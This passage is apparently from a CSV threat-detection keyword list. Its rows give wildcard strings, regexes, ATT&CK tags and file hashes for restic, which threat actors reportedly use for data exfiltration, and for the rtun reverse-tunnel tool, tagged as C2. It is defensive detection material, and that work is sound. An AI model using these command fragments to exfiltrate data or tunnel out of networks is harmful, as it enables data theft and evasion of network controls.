TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ff955edce7641fd51844726398cedcd9a27d45f74731ca3c79a0abab5bf5ebc1*",".{0,1000}ff955edce7641fd51844726398cedcd9a27d45f74731ca3c79a0abab5bf5ebc1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ffba5315499b161375d0a2e0f54789e93d32383be19ec2b7b1a8fe050dd9af6e*",".{0,1000}ffba5315499b161375d0a2e0f54789e93d32383be19ec2b7b1a8fe050dd9af6e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*http://*:9000/restic*",".{0,1000}http\:\/\/.{0,1000}\:9000\/restic.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*https://*:9000/restic*",".{0,1000}https\:\/\/.{0,1000}\:9000\/restic.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*restic backup --*",".{0,1000}restic\sbackup\s\-\-.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*restic check --read-data*",".{0,1000}restic\scheck\s\-\-read\-data.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*restic init --repo *",".{0,1000}restic\sinit\s\-\-repo\s.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*restic -o 
s3.bucket-lookup*",".{0,1000}restic\s\-o\ss3\.bucket\-lookup.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*restic -r *",".{0,1000}restic\s\-r\s.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*restic --repo *",".{0,1000}restic\s\-\-repo\s.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*restic/restic:latest*",".{0,1000}restic\/restic\:latest.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*restic_*_windows_amd64.exe*",".{0,1000}restic_.{0,1000}_windows_amd64\.exe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*RESTIC_PASSWORD=""I9n7G7G0ZpDWA3GOcJbIuwQCGvGUBkU5*",".{0,1000}RESTIC_PASSWORD\=\""I9n7G7G0ZpDWA3GOcJbIuwQCGvGUBkU5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - 
TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*RESTIC_REST_PASSWORD*",".{0,1000}RESTIC_REST_PASSWORD.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*RESTIC_REST_USERNAME*",".{0,1000}RESTIC_REST_USERNAME.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*winpty restic *",".{0,1000}winpty\srestic\s.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "* rtun-server-windows-amd64.exe*",".{0,1000}\srtun\-server\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "* rtun-windows-amd64.exe*",".{0,1000}\srtun\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "* Starting tunneling server*",".{0,1000}\sStarting\stunneling\sserver.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*/reverse-tunnel.git*",".{0,1000}\/reverse\-tunnel\.git.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*/reverse-tunnel/agent/cmd*",".{0,1000}\/reverse\-tunnel\/agent\/cmd.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*/reverse-tunnel/server/service*",".{0,1000}\/reverse\-tunnel\/server\/service.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*/rtun-freebsd-amd64*",".{0,1000}\/rtun\-freebsd\-amd64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*/rtun-linux-amd64*",".{0,1000}\/rtun\-linux\-amd64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*/rtun-linux-arm64*",".{0,1000}\/rtun\-linux\-arm64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*/rtun-mac-amd64*",".{0,1000}\/rtun\-mac\-amd64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*/rtun-server-freebsd-amd64*",".{0,1000}\/rtun\-server\-freebsd\-amd64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*/rtun-server-linux-amd64*",".{0,1000}\/rtun\-server\-linux\-amd64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*/rtun-server-linux-arm64*",".{0,1000}\/rtun\-server\-linux\-arm64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*/rtun-server-mac-amd64*",".{0,1000}\/rtun\-server\-mac\-amd64.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*/rtun-server-windows-amd64.exe*",".{0,1000}\/rtun\-server\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*/rtun-windows-amd64.exe*",".{0,1000}\/rtun\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*\rtun-server-windows-amd64.exe*",".{0,1000}\\rtun\-server\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*\rtun-windows-amd64.exe*",".{0,1000}\\rtun\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*0f5c329fa1e4abd3d1d2fbbd493d0dcf419bc33e1aa809ed55500481ed2ebe65*",".{0,1000}0f5c329fa1e4abd3d1d2fbbd493d0dcf419bc33e1aa809ed55500481ed2ebe65.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*14d29e0f977fb74a925c9c2cab1ef3ed34eb6b35345b0af1645a64f6b85040f8*",".{0,1000}14d29e0f977fb74a925c9c2cab1ef3ed34eb6b35345b0af1645a64f6b85040f8.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*19529823b5d0e8b0c2a4cf5e67b825254efbd7568b7d6b204a220e684e3787d7*",".{0,1000}19529823b5d0e8b0c2a4cf5e67b825254efbd7568b7d6b204a220e684e3787d7.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*1ccedb3262e89f8d841a6c6b3ea5e8c5ef8fb42779168e5cc47ba1674be930f1*",".{0,1000}1ccedb3262e89f8d841a6c6b3ea5e8c5ef8fb42779168e5cc47ba1674be930f1.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*2e28d91e35ca1009d77fc67d36553730e785333ffc14cb8af621113571bd730b*",".{0,1000}2e28d91e35ca1009d77fc67d36553730e785333ffc14cb8af621113571bd730b.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*2e4ce6b3a2e7019459a3f6cad24e07ee614c800a9d5b29c3d83f50fd758d1a93*",".{0,1000}2e4ce6b3a2e7019459a3f6cad24e07ee614c800a9d5b29c3d83f50fd758d1a93.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*397ac6bd1ffe2d8baf3c8e41307bb36339fa0f7a97e61b614d25ab85cb3b90a7*",".{0,1000}397ac6bd1ffe2d8baf3c8e41307bb36339fa0f7a97e61b614d25ab85cb3b90a7.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*3b76d79a32202f1cdbae1e5ed949ee7a75f373a9280fbdfd15a6cc4490a1b595*",".{0,1000}3b76d79a32202f1cdbae1e5ed949ee7a75f373a9280fbdfd15a6cc4490a1b595.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*3e62062061ddd7a0974eb2f6106dc96d3c54f95f41121ff355de12d5a23e2624*",".{0,1000}3e62062061ddd7a0974eb2f6106dc96d3c54f95f41121ff355de12d5a23e2624.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*411b16657e992717f0eb9ac77b2a5468e23afcc8747bdabba4bcdfc008c845e7*",".{0,1000}411b16657e992717f0eb9ac77b2a5468e23afcc8747bdabba4bcdfc008c845e7.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*512fba960ac745dbb62576225ee9dd7f65bf83261c8d1364f50101c8e3fd55bf*",".{0,1000}512fba960ac745dbb62576225ee9dd7f65bf83261c8d1364f50101c8e3fd55bf.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*5e47aac7b50d8ac6ce9ebba6c28ca58ef1332493fba47ab47ec1d2da61c7f6e2*",".{0,1000}5e47aac7b50d8ac6ce9ebba6c28ca58ef1332493fba47ab47ec1d2da61c7f6e2.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*6ab324b655ea1c39c3c8fb5709f322f0c468a203411fbbcb460b36ee0fc1d835*",".{0,1000}6ab324b655ea1c39c3c8fb5709f322f0c468a203411fbbcb460b36ee0fc1d835.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*6f94077fc6f9092d9e9282bee1588e70aaf70ad90407e2bd164c38325249af5e*",".{0,1000}6f94077fc6f9092d9e9282bee1588e70aaf70ad90407e2bd164c38325249af5e.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*774dbc75e046096a7a18dbcef9353543db74312e9656ff4017d7f41c778be2fb*",".{0,1000}774dbc75e046096a7a18dbcef9353543db74312e9656ff4017d7f41c778be2fb.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*793e227ee3a811a143e303909645a874c8db144cf6b48f480411efb2fdd44904*",".{0,1000}793e227ee3a811a143e303909645a874c8db144cf6b48f480411efb2fdd44904.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*8fd62fc653cef0bf765a71cf20a917c8440689e9f5ff77e95a5fea7be6818c66*",".{0,1000}8fd62fc653cef0bf765a71cf20a917c8440689e9f5ff77e95a5fea7be6818c66.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*955854f00a41ee91d047e520aa445035d881f9cb214de1ed49fac829e1caf829*",".{0,1000}955854f00a41ee91d047e520aa445035d881f9cb214de1ed49fac829e1caf829.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*a522a8bfbf83bf52cde85edb32577d6b9acddac6e3a432726f659ae7dd5a6a96*",".{0,1000}a522a8bfbf83bf52cde85edb32577d6b9acddac6e3a432726f659ae7dd5a6a96.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*a79a4c3ae4ecd33b7c078631d3424137ff332d7897ecd6e9ddee28df138a0064*",".{0,1000}a79a4c3ae4ecd33b7c078631d3424137ff332d7897ecd6e9ddee28df138a0064.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*a8ebccf2cc342e1b5154989cd784691b5740a7f3df77cd8adb785f67384a93de*",".{0,1000}a8ebccf2cc342e1b5154989cd784691b5740a7f3df77cd8adb785f67384a93de.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*ba65a4a428b16812cfade65b50138e0b865496a637bdf5dad7993bf3907cdd60*",".{0,1000}ba65a4a428b16812cfade65b50138e0b865496a637bdf5dad7993bf3907cdd60.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*d66a79fcbac667d28014c15003770a35bd941c346e87fb8e4e1b7fd02c3291c9*",".{0,1000}d66a79fcbac667d28014c15003770a35bd941c346e87fb8e4e1b7fd02c3291c9.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*d71bbdd588cd4f1507ea794ed63be80a7cb3bbb1d30430150dd8800adec83fd5*",".{0,1000}d71bbdd588cd4f1507ea794ed63be80a7cb3bbb1d30430150dd8800adec83fd5.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*d7eceeb90b1e75b17c42c6cef5b42e0ef1dc615efba9424bafce718304c7ee43*",".{0,1000}d7eceeb90b1e75b17c42c6cef5b42e0ef1dc615efba9424bafce718304c7ee43.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*dec51bba37da4ecf4df8994cb21931fdfcc4f661c362cb8392f44229d42ef337*",".{0,1000}dec51bba37da4ecf4df8994cb21931fdfcc4f661c362cb8392f44229d42ef337.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" 